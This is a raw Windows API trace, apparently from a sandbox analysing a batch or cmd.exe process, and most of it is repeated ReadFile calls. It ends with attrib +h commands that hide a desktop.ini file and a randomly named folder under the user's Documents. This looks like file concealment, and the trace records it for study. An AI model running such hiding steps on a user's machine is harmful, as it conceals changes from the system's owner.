ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.752] _close (_FileHandle=4) returned 0 [0133.752] FindNextFileW (in: hFindFile=0x3be6b8, lpFindFileData=0x2ef248 | out: lpFindFileData=0x2ef248) returned 0 [0133.753] GetLastError () returned 0x12 [0133.753] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.753] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0133.756] _close (_FileHandle=3) returned 0 [0133.757] GetConsoleTitleW (in: lpConsoleTitle=0x2ef680, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.757] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.757] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.757] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.758] GetLastError () returned 0x2 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.758] GetLastError () returned 0x2 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.758] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.758] GetLastError () returned 0x2 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.758] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.758] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.759] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.759] GetConsoleTitleW (in: lpConsoleTitle=0x2ef414, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.759] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef29c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef364 | out: lpAttributeList=0x2ef29c, lpSize=0x2ef364) returned 1 [0133.759] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef29c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef35c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef29c, lpPreviousValue=0x0) returned 1 [0133.759] GetStartupInfoW (in: lpStartupInfo=0x2ef258 | out: lpStartupInfo=0x2ef258*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.759] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.759] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef344 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessInformation=0x2ef344*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb38, dwThreadId=0xb34)) returned 1 [0133.761] CloseHandle (hObject=0x50) returned 1 [0133.761] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.761] GetEnvironmentStringsW () returned 0x3c2dd0* [0133.761] FreeEnvironmentStringsW (penv=0x3c2dd0) returned 1 [0133.761] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0133.810] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef238 | out: lpExitCode=0x2ef238*=0x0) returned 1 [0133.810] CloseHandle (hObject=0x4c) returned 1 [0133.810] _vsnwprintf (in: _Buffer=0x2ef380, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef244 | out: _Buffer="00000000") returned 8 [0133.810] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.810] GetEnvironmentStringsW () returned 0x3c2dd0* [0133.810] FreeEnvironmentStringsW (penv=0x3c2dd0) returned 1 [0133.810] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.810] GetEnvironmentStringsW () returned 0x3c2dd0* [0133.810] FreeEnvironmentStringsW (penv=0x3c2dd0) returned 1 [0133.810] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef29c | out: lpAttributeList=0x2ef29c) [0133.811] GetConsoleTitleW (in: lpConsoleTitle=0x2ef680, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.811] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.811] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.811] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.811] GetLastError () returned 0x2 [0133.811] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.811] GetLastError () returned 0x2 [0133.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.812] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.812] GetLastError () returned 0x2 [0133.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.812] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.812] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.812] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.812] GetConsoleTitleW (in: lpConsoleTitle=0x2ef414, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.812] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef29c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef364 | out: lpAttributeList=0x2ef29c, lpSize=0x2ef364) returned 1 [0133.812] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef29c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef35c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef29c, lpPreviousValue=0x0) returned 1 [0133.812] GetStartupInfoW (in: lpStartupInfo=0x2ef258 | out: lpStartupInfo=0x2ef258*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.813] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.813] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef344 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessInformation=0x2ef344*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb54, dwThreadId=0xb44)) returned 1 [0133.815] CloseHandle (hObject=0x4c) returned 1 